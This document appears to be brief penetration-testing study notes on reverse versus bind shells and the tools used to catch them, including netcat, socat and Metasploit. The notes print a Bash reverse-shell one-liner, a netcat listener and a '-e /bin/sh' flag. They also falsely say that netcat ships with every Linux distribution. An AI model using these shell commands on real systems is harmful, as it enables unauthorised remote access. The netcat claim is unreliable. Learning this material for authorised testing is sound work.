Reverse Shells vs Bind Shells
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Victim connects to us
Attack box is listening on a specific port
nc -lvp
- means listening verbose port
-e /bin/sh
By far the most commonly used
Bash reverse shell command
bash -i >& /dev/tcp/ 0>&1
Open up a port on victim machine and then connect to it
Useful when you have to bypass NAT or some sort of firewall
When connection has to come from external or outside network boundary
Used to manually perform all kinds of networking interactions, including things like banner grabbing during enumeration
Can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system
Easy to lose but can be improved
Like netcat on steroids
More stable than netcat shells out of the box
Two big catches:
The syntax is more difficult
Netcat is installed on every Linux distribution by default.
Metasploit -- multi/handler
The auxiliary/multi/handler
module of the Metasploit framework, used to receive reverse shells
A fully-fledged way to obtain stable shells, with further options to improve the caught shell
The only way to interact with a meterpreter shell, the easiest way to handle staged payloads
Used to generate payloads on the fly
Can generate payloads other than reverse and bind shells